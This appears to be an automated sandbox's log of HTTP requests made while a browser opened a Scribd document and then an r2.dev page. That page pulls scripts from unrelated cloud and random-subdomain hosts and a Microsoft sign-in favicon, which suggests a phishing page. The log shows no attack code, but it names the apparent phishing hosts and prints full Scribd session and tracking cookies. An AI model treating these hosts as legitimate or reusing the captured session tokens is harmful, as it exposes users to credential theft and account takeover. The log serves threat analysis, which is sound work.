    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=287045611447707&ev=PageView&dl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&rl=&if=false&ts=1733522382007&sw=1280&sh=1024&v=2.9.178&r=stable&a=tmSimo-GTM-WebTemplate&ec=0&o=4126&fbp=fb.1.1733522382001.679305698926452788&cs_est=true&ler=empty&cdl=API_unavailable&it=1733522370298&coo=false&tm=1&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/991817613/?random=1733522375967&cv=11&fst=1733518800000&bg=ffffff&guid=ON&async=1&gtm=45be4c40v9178425511z878386455za201zb78386455&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification&hn=www.googleadservices.com&frm=0&tiba=Advice%20Notification%20%7C%20PDF&npa=0&us_privacy=1-N-&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dPLzYBA_46nc4U6kw41ysvovTnaSID2iMgSNuSAypzdAHByiM&random=4112965827&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.2.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pub-28cbd5bc68cb4c26b93f263849a029cc.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /scribd.ico?de2a209e8?v=5 HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/991817613/?random=1733522375967&cv=11&fst=1733518800000&bg=ffffff&guid=ON&async=1&gtm=45be4c40v9178425511z878386455za201zb78386455&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification&hn=www.googleadservices.com&frm=0&tiba=Advice%20Notification%20%7C%20PDF&npa=0&us_privacy=1-N-&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dPLzYBA_46nc4U6kw41ysvovTnaSID2iMgSNuSAypzdAHByiM&random=4112965827&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.2.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /scribd.ico?de2a209e8?v=5 HTTP/1.1Host: s-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/v1/events HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _scribd_session=NklvbGhTTVUxUFJDWXpuTks5U0RVWHRrWDNCUGQ1ZWpBZmN6aXJOelRyTURRZi9qY1dhS1lhMVkyOUl1QkVMcnNkdm55cFJ3QXJIVGV3VW5XRWdRdlkvQlJJY2V5T0ttS3RITXF6N2FGWDgzZTdQejVENlEvRW9sVkVsSk5GUE05dEhQRzdoTlBjTTBKWVQ2SlBYSi92NDlNMEZ6c2hVVHpSd0FHdUs0eWF1aTJOQ2ZhckVCRnVEN0pZUnYrNk55dVZkR2cvV3hnY0x6QmhmNmpmMFNwbFlPV1lFUU1ndGdPRERGUWJ5VGdaQS9iNXM1MG1nRm1LWDM4dWhGYUh6NmJaZHdOdFNpb0szb2Mvd2RKcTFwcVZjRUhzaWxJWVBvcXIrcTdEdy9oL1JyRTROZW9yMUVGcUZ6MzNPc2JOeTItLXR3Q2J4VU9ETDdKVUN3MndaYTdYeGc9PQ%3D%3D--013a678e67b88405a39303e630fa2ecf6921e89c; _rdt_uuid=1733522373804.90ad4cc1-c7c0-404a-8932-712d98b9d875; IR_gbd=scribd.com; IR_14808=1733522374271%7C0%7C1733522374271%7C%7C; _uetsid=61d3cba0b41d11ef9aea290cc24698a9; _uetvid=61d42620b41d11ef884d05fafe2184f7; _ga=GA1.2.30215218.1733522367; _gid=GA1.2.830502526.1733522377; __ssid=88cc5efd775d85316f8301f58ee373f; _ga_8KZ8BV0P5W=GS1.1.1733522367.1.1.1733522381.46.0.0; _ga_Z4ZC50DED6=GS1.1.1733522367.1.1.1733522381.46.0.0; _fbp=fb.1.1733522382001.679305698926452788; _tt_enable_cookie=1; _ttp=M5jx_JzCNLWicY7qEO5VYLqIGGL.tt.1
    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=NsFdCpOb8MEGFPx&MD=+MfZCRKU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rphfymzrfvbgvnwbxgqz.constructappsolution.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/v1/events HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _scribd_session=NklvbGhTTVUxUFJDWXpuTks5U0RVWHRrWDNCUGQ1ZWpBZmN6aXJOelRyTURRZi9qY1dhS1lhMVkyOUl1QkVMcnNkdm55cFJ3QXJIVGV3VW5XRWdRdlkvQlJJY2V5T0ttS3RITXF6N2FGWDgzZTdQejVENlEvRW9sVkVsSk5GUE05dEhQRzdoTlBjTTBKWVQ2SlBYSi92NDlNMEZ6c2hVVHpSd0FHdUs0eWF1aTJOQ2ZhckVCRnVEN0pZUnYrNk55dVZkR2cvV3hnY0x6QmhmNmpmMFNwbFlPV1lFUU1ndGdPRERGUWJ5VGdaQS9iNXM1MG1nRm1LWDM4dWhGYUh6NmJaZHdOdFNpb0szb2Mvd2RKcTFwcVZjRUhzaWxJWVBvcXIrcTdEdy9oL1JyRTROZW9yMUVGcUZ6MzNPc2JOeTItLXR3Q2J4VU9ETDdKVUN3MndaYTdYeGc9PQ%3D%3D--013a678e67b88405a39303e630fa2ecf6921e89c; _rdt_uuid=1733522373804.90ad4cc1-c7c0-404a-8932-712d98b9d875; IR_gbd=scribd.com; IR_14808=1733522374271%7C0%7C1733522374271%7C%7C; _uetsid=61d3cba0b41d11ef9aea290cc24698a9; _uetvid=61d42620b41d11ef884d05fafe2184f7; _ga=GA1.2.30215218.1733522367; _gid=GA1.2.830502526.1733522377; __ssid=88cc5efd775d85316f8301f58ee373f; _ga_8KZ8BV0P5W=GS1.1.1733522367.1.1.1733522381.46.0.0; _ga_Z4ZC50DED6=GS1.1.1733522367.1.1.1733522381.46.0.0; _fbp=fb.1.1733522382001.679305698926452788; _tt_enable_cookie=1; _ttp=M5jx_JzCNLWicY7qEO5VYLqIGGL.tt.1
    Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/v1/events HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _scribd_session=NklvbGhTTVUxUFJDWXpuTks5U0RVWHRrWDNCUGQ1ZWpBZmN6aXJOelRyTURRZi9qY1dhS1lhMVkyOUl1QkVMcnNkdm55cFJ3QXJIVGV3VW5XRWdRdlkvQlJJY2V5T0ttS3RITXF6N2FGWDgzZTdQejVENlEvRW9sVkVsSk5GUE05dEhQRzdoTlBjTTBKWVQ2SlBYSi92NDlNMEZ6c2hVVHpSd0FHdUs0eWF1aTJOQ2ZhckVCRnVEN0pZUnYrNk55dVZkR2cvV3hnY0x6QmhmNmpmMFNwbFlPV1lFUU1ndGdPRERGUWJ5VGdaQS9iNXM1MG1nRm1LWDM4dWhGYUh6NmJaZHdOdFNpb0szb2Mvd2RKcTFwcVZjRUhzaWxJWVBvcXIrcTdEdy9oL1JyRTROZW9yMUVGcUZ6MzNPc2JOeTItLXR3Q2J4VU9ETDdKVUN3MndaYTdYeGc9PQ%3D%3D--013a678e67b88405a39303e630fa2ecf6921e89c; _rdt_uuid=1733522373804.90ad4cc1-c7c0-404a-8932-712d98b9d875; IR_gbd=scribd.com; IR_14808=1733522374271%7C0%7C1733522374271%7C%7C; _uetsid=61d3cba0b41d11ef9aea290cc24698a9; _uetvid=61d42620b41d11ef884d05fafe2184f7; _ga=GA1.2.30215218.1733522367; _gid=GA1.2.830502526.1733522377; __ssid=88cc5efd775d85316f8301f58ee373f; _ga_8KZ8BV0P5W=GS1.1.1733522367.1.1.1733522381.46.0.0; _ga_Z4ZC50DED6=GS1.1.1733522367.1.1.1733522381.46.0.0; _fbp=fb.1.1733522382001.679305698926452788; _tt_enable_cookie=1; _ttp=M5jx_JzCNLWicY7qEO5VYLqIGGL.tt.1
    Source: global trafficHTTP traffic detected: GET /next.php HTTP/1.1Host: drizzysamson.constructappsolution.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
